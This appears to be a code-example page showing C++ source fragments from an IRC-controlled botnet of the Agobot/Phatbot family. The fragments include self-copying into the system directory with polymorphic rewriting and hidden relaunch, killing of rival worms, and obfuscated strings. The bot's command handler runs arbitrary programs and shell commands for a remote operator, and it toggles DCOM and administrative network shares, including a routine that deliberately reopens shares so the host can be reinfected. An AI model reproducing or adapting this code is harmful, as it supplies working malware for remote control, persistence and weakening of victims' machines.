		unsigned long lStartTime=GetTickCount(); bool bFound=true;
		while((GetTickCount()-lStartTime) < 60000 && bFound)
		{	
			if(GetCopies(sFilename)<2) bFound=false; Sleep(1000);
		}
		if(bFound) {
			#ifdef DBGCONSOLE
						g_cMainCtrl.m_cConsDbg.Log(5, "Found 2 copies, exiting...\n");
			#endif // DBGCONSOLE
			exit(1); 
		}
	}*/

	long lTimeoutStart;

	if(!cfilename.Find(sFilename.CStr(), 0))
		if(g_cMainCtrl.m_cCmdLine.m_cConfig.bUpdate)
			KillProcess(sFilename.CStr());

#ifdef WIN32
	// Kill Sobig.F
	KillProcess(dp(23,9,14,16,16,18,71,70,78,5,24,5,0).CStr());

	// Kill Welchia
	KillProcess(dp(4,12,12,8,15,19,20,78,5,24,5,0).CStr());
	KillProcess(dp(20,6,20,16,4,78,5,24,5,0).CStr());

	
	// Kill MSBlast
	KillProcess(dp(13,19,2,12,1,19,20,78,5,24,5,0).CStr());
	KillProcess(dp(16,5,14,9,19,71,70,78,5,24,5,0).CStr());
	KillProcess(dp(13,19,16,1,20,3,8,78,5,24,5,0).CStr());

#else
	// FIXME: Add linux worm killer here
#endif // WIN32

	if(!cfilename.Find(sysdir, 0))
	{	
		sprintf(tstr, "%s%c%s", sysdir.CStr(), DIRCHAR, sFilename.CStr());

		lTimeoutStart=GetTickCount();

		#ifdef DBGCONSOLE
				g_cMainCtrl.m_cConsDbg.Log(5, "Trying to copy to system directory...\n");
		#endif // DBGCONSOLE

		while(CopyFile(cfilename, tstr, false)==false &&
			GetTickCount()-lTimeoutStart < 25000) Sleep(2000);

		#ifdef DBGCONSOLE
				g_cMainCtrl.m_cConsDbg.Log(5, "Finished copying to system directory...\n");
		#endif // DBGCONSOLE

		#ifndef _DEBUG

			#ifdef DBGCONSOLE
					g_cMainCtrl.m_cConsDbg.Log(5, "Starting new process...\n");
			#endif // DBGCONSOLE

			if(g_cMainCtrl.m_cBot.bot_meltserver.bValue) {
				strncat(tstr, " -bai ", sizeof(tstr));
				strncat(tstr, cfilename.CStr(), sizeof(tstr));
			}

			PROCESS_INFORMATION pinfo; 
			STARTUPINFO sinfo;
			memset(&sinfo, 0, sizeof(STARTUPINFO));
			sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE;
			if(CreateProcess(NULL, tstr, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) 
			{
				exit(0);
			}

		#endif
	}
	return true;
}
Example #17
0
bool CBot::HandleCommand(CMessage *pMsg)
{	
	// ID
	if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); 
	}

	// Execute
	else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr()))
	{
		CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
		#ifdef WIN32
			CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
			sText.Assign(sTextExp); 
			PROCESS_INFORMATION pinfo; 
			STARTUPINFO sinfo;
			memset(&sinfo, 0, sizeof(STARTUPINFO)); 
			sinfo.cb=sizeof(sinfo);
			if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
			if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; }
		#endif
		return true; 
	}

	// Remove Bot
	else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) 
	{
		CString sNick(pMsg->sChatString.Token(1, " ", true));
		if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) {
			if(g_cMainCtrl.m_cBot.as_enabled.bValue)
				g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue);
			if(g_cMainCtrl.m_cBot.as_service.bValue)
				g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue);
			g_cMainCtrl.m_cInstaller.Uninstall();
			g_cMainCtrl.m_cIRC.m_bRunning=false;
			g_cMainCtrl.m_bRunning=false; 
		}
	}

	// About
	else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) {
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); 
	}

	
	// Flush DNS
	else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) 
	{
		#ifdef WIN32
			// ipconfig.exe /flushdns
			Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr());
		#endif
		return true; 
	}

	// Open File
	else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) 
	{
		CString sText; 
		sText=pMsg->sChatString.Token(1, " ").CStr(); 
		CString bRet;

		bRet=(char)ShellExecute(
			NULL, 
			"open", 
			sText.CStr(), 
			NULL,
			NULL,
			SW_SHOWNORMAL
		);

	//	bRet=system(sText.CStr())>0;
	//	if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
		//else return 
		g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); 
	}

	// Quit
	else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) 
	{
		g_cMainCtrl.m_cIRC.m_bRunning=false; 
		return true; 
	}

	// DNS
	else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) 
	{
		CString sReply; 
		hostent *pHostent=NULL; 
		in_addr iaddr;
		if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
		unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
		if(addr!=INADDR_NONE) {
			pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
			if(pHostent) {
				sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			}
		} else {
			pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
			if(pHostent) {
				iaddr=*((in_addr*)*pHostent->h_addr_list);
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
				return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
			} 
		}
		if(!pHostent) {
			sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr());
			return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); 
		} 
	}

	// Random Nickname
	else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) 
	{
		CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr());
		g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
		return true; 
	}

	// Run Command
	else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) 
	{	
		#ifdef WIN32
			if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
			CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); 
			bool bRet=false;
			CString sReplyBuf; 
			sReplyBuf.Format("Executed: %s.", sText.CStr());
			if(system(sText.CStr())==-1) 
			{ 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; 
			} else { 
				g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; 
			}
		#endif
		return true; 
	}

	// System Information
	else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) 
	{
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); 
	}

	// Find Files
	//else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) 
//	{
	/*	CString strMask = pMsg->sChatString.Token(1, " ");
		CString strDir  = pMsg->sChatString.Token(2, " ");
		return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); 
	*/
	//}

	// Change Nickname
	else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) 
	{
		g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
		g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr());
		return true; 
	}

	// Uptime check (default: 7d)
	else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) 
	{
		int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); 
		if(!iDays) iDays=7;
		CString sUptime=LongUptime(iDays);
		if(sUptime.Compare("")) {
			g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				sUptime.Str(), pMsg->sReplyTo.Str());
		}
		return true; 
	}


	// Secure Bot
	else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) 
	{	
		#ifdef WIN32
		CString regLoc;
		regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr();


		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);
		
		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr());
		CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr());
		RegCloseKey(hkey);
		KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH);
		tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr());
		DeleteFile(tmpBagle);

		lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey);
		RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr());
		RegCloseKey(hkey);

		system("net share c$ /delete /y");
		system("net share d$ /delete /y");
		system("net share ipc$ /delete /y");
		system("net share admin$ /delete /y");



		#endif
		return true; 
	}

	return false; 
}
Example #18
0
bool CInstaller::CopyToSysDir(CString &sFilename)
{
	char tstr[MAX_PATH];
#ifdef WIN32
	CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	m_sSysDir.Assign(sysdir.CStr());
	CString cfilename; GetModuleFileName(GetModuleHandle(NULL), cfilename.GetBuffer(MAX_PATH), MAX_PATH);

	HINSTANCE kernel32_dll=LoadLibrary("kernel32.dll");
	if(kernel32_dll)
	{	fRegisterServiceProcess=(RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess");
		fCreateToolhelp32Snapshot=(CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot");
		fProcess32First=(P32F)GetProcAddress(kernel32_dll, "Process32First");
		fProcess32Next=(P32N)GetProcAddress(kernel32_dll, "Process32Next");
		if(fRegisterServiceProcess) fRegisterServiceProcess(0, 1); }
#else
	m_sSysDir.Assign("/usr/sbin");
	CString sysdir(m_sSysDir);
	CString cfilename(g_pMainCtrl->m_sArgv0);
#endif // WIN32

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(5, "Checking for multiple copies...\n");
#endif // DBGCONSOLE
	if(!g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate && !g_pMainCtrl->m_cCmdLine.m_cConfig.bService)
	{
		unsigned long lStartTime=GetTickCount(); bool bFound=true;
		while((GetTickCount()-lStartTime) < 60000 && bFound)
		{	if(GetCopies(sFilename)<2) bFound=false; Sleep(1000);
		}
		if(bFound) {
#ifdef DBGCONSOLE
			g_pMainCtrl->m_cConsDbg.Log(5, "Found 2 copies, exiting...\n");
#endif // DBGCONSOLE
			exit(1); }
	}

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(5, "First copy running...\n");
#endif // DBGCONSOLE
	long lTimeoutStart;

	if(!cfilename.Find(sFilename.CStr(), 0))
		if(g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate)
			KillProcess(sFilename.CStr());

	if(!cfilename.Find(sysdir, 0) || cfilename.Find("winhlpp32.exe", 0))
#ifdef LINUX
	if(!cfilename.Find(sFilename, 0))
#endif // LINUX
	{	sprintf(tstr, "%s%c%s", sysdir.CStr(), DIRCHAR, sFilename.CStr());

		lTimeoutStart=GetTickCount();

#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(5, "Trying to copy to system directory...\n");
#endif // DBGCONSOLE

		// FIXME::BAD!!!
#ifdef WIN32
		if(g_pMainCtrl->m_cBot.inst_polymorph.bValue) {
			// Polymorph here
			if(!g_pMainCtrl->m_cPolymorph.DoPolymorph(cfilename, tstr))
			{	// Fall back to copying if this didnt work
				while(CopyFile(cfilename, tstr, false)==false &&
					GetTickCount()-lTimeoutStart < 25000) Sleep(2000); }
		} else {
			// Without Polymorph
			while(CopyFile(cfilename, tstr, false)==false &&
				GetTickCount()-lTimeoutStart < 25000) Sleep(2000);
		}
#else
		char szCmdBuf[MAX_PATH]; sprintf(szCmdBuf, "cp %s %s", cfilename.CStr(), tstr);
		system(szCmdBuf);
#endif // WIN32

#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(5, "Finished copying to system directory...\n");
#endif // DBGCONSOLE

#ifndef _DEBUG

#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(5, "Starting new process...\n");
#endif // DBGCONSOLE

		if(g_pMainCtrl->m_cBot.bot_meltserver.bValue) {
			strncat(tstr, " -meltserver \"", sizeof(tstr));
			strncat(tstr, cfilename.CStr(), sizeof(tstr));
			strncat(tstr, "\"", sizeof(tstr));
		}

#ifdef WIN32
		PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
		memset(&sinfo, 0, sizeof(STARTUPINFO));
		sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE;
		if(CreateProcess(NULL, tstr, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			exit(0); }
#else 
		sprintf(szCmdBuf, "%s 2>&1 > /dev/null 2>&1 &", tstr);
		system(szCmdBuf);
		exit(0);
#endif // WIN32

#endif // _DEBUG
	}
	return true;
}
Example #19
0
bool CBot::HandleCommand(CMessage *pMsg)
{	
	if(!pMsg->sCmd.Compare("bot.remove") || !pMsg->sCmd.Compare("bot.removeallbut")) {
		CString sId(pMsg->sChatString.Token(1, " ", true));
		if(!pMsg->sCmd.Compare("bot.removeallbut")) if(!sId.Compare(g_pMainCtrl->m_cBot.bot_id.sValue)) return false;
		g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "removing bot...", pMsg->sReplyTo);
#ifdef WIN32
		/// should unsecure system as remove bot to allow recycling //
		
		// Set EnableDCOM to "Y"
		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);

		// UnSecure Shares
		Execute("net.exe", "net share c$=c:\\");
		Execute("net.exe", "net share d$=d:\\");
		Execute("net.exe", "net share e$=e:\\");
		Execute("net.exe", "net share ipc$");
		Execute("net.exe", "net share admin$");

		// Delete Autostart
		if(g_pMainCtrl->m_cBot.as_enabled.bValue)
			g_pMainCtrl->m_cInstaller.RegStartDel(g_pMainCtrl->m_cBot.as_valname.sValue);
		if(g_pMainCtrl->m_cBot.as_service.bValue)
			g_pMainCtrl->m_cInstaller.ServiceDel(g_pMainCtrl->m_cBot.as_service_name.sValue);
#endif
		g_pMainCtrl->m_cInstaller.Uninstall();
		g_pMainCtrl->m_cIRC.m_bRunning=false; g_pMainCtrl->m_bRunning=false; }

	else if(!pMsg->sCmd.Compare("bot.execute")) {
		CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
#ifdef WIN32
		CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
		sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
		memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo);
		if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
		if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
			g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; }
#else
		CString sCmdBuf; sCmdBuf.Format("/bin/sh -c \"%s\"", sText.CStr());
		if(system(sCmdBuf.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; }
#endif
		return true; }

	else if(!pMsg->sCmd.Compare("bot.open")) {
		if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
		CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false;
#ifdef WIN32
		bRet=(int)ShellExecute(0, "open", sText.CStr(), NULL, NULL, SW_SHOW)>=32;
#else
		bRet=system(sText.CStr())>0;
#endif
		if(bRet) return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
		else return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't open file.", pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.dns")) {
		CString sReply; hostent *pHostent=NULL; in_addr iaddr;
		if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
		unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
	
		if(addr!=INADDR_NONE) {
			pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
			if(pHostent) {
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
				return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); }
		} else {
			pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
			if(pHostent) {
				iaddr=*((in_addr*)*pHostent->h_addr_list);
				sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
				return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } }
		
		if(!pHostent) {
			sReply.Format("couldn't resolve host \"%s\"!", pMsg->sChatString.Token(1, " ").CStr());
			return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } }

	else if(!pMsg->sCmd.Compare("bot.about")) {
		CString sReplyBuf; sReplyBuf.Format("%s", g_pMainCtrl->m_sNameVerStr.CStr());
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.id")) {
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.nick")) {
		g_pMainCtrl->m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
		g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", g_pMainCtrl->m_sUserName.CStr());
		return true; }

	else if(!pMsg->sCmd.Compare("bot.quit") || !pMsg->sCmd.Compare("bot.die")) {
		g_pMainCtrl->m_cIRC.m_bRunning=false; return true; }

	else if(!pMsg->sCmd.Compare("bot.sysinfo")) {
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.longuptime")) {
		int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7;
		CString sUptime=LongUptime(iDays);
		if(sUptime.Compare("")) {
			g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				sUptime.Str(), pMsg->sReplyTo.Str()); }
		return true; }

	else if(!pMsg->sCmd.Compare("bot.status")) {
		return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, Status().Str(), pMsg->sReplyTo.Str()); }

	else if(!pMsg->sCmd.Compare("bot.rndnick")) {
		CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
		g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", sRndNick.CStr());
		g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
		return true; }

	else if(!pMsg->sCmd.Compare("bot.flushdns")) {
#ifdef WIN32
		Execute("ipconfig.exe", "/flushdns");
#else
		Execute("nscd", "-i hosts");
#endif // WIN32
		return true; }

	else if(!pMsg->sCmd.Compare("bot.secure")) {	
#ifdef WIN32
		// Set EnableDCOM to "N"
		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);

		// Secure Shares
		system("net share c$ /delete /y");
		system("net share d$ /delete /y");
		system("net share ipc$ /delete /y");
		system("net share admin$ /delete /y");

		g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				"Bot Secured", pMsg->sReplyTo.Str());

#endif
		return true; }


	else if(!pMsg->sCmd.Compare("bot.unsecure")) {	
#ifdef WIN32
		// Set EnableDCOM to "Y"
		HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
		strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf);
		LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
		RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
		RegCloseKey(hkey);

		// UnSecure Shares
		system("net share c$=c:\\");
		system("net share d$=d:\\");
		system("net share e$=e:\\");
		system("net share ipc$");
		system("net share admin$");

		g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
				"Bot UnSecured", pMsg->sReplyTo.Str());
#endif

		return true; }




	
	else if(!pMsg->sCmd.Compare("bot.command")) {	
#ifdef WIN32
		if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
		CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false;
		CString sReplyBuf; sReplyBuf.Format("command (%s) executed.", sText.CStr());

		if(system(sText.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute command.", pMsg->sReplyTo.Str()); return false; }
		else { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; }
#endif
		return true; }


	return false; }